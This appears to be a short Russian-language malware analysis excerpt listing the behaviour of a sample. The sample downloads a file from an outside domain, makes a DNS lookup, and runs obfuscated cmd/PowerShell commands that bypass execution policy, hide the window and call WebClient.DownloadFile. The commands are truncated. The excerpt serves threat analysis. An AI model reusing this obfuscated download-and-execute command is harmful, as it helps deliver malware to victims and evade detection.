Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powE^r^sh^elL^.^exE -e^XeCutIo^nPoLICY By^paSs -^NoP^r^ofI^le^ ^-winD^Owst^YlE ^H^iDdE^n ^(n^Ew-ObjeCt ^SYSTEm.nET^.we^BCLiE^nt)^.D^Ow^NLoa^D^F^ilE('http://www.zoerpoled.top/...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "powE^r^sh^elL^.^exE -e^XeCutIo^nPoLICY By^paSs -^NoP^r^ofI^le^ ^-winD^Owst^YlE ^H^iDdE^n ^(n^Ew-ObjeCt ^SYSTEm.nET^.we^BCLiE^nt)^.D^Ow^NLoa^D^F^ilE('http://www.zoerpoled.top/...' (со скрытым окном)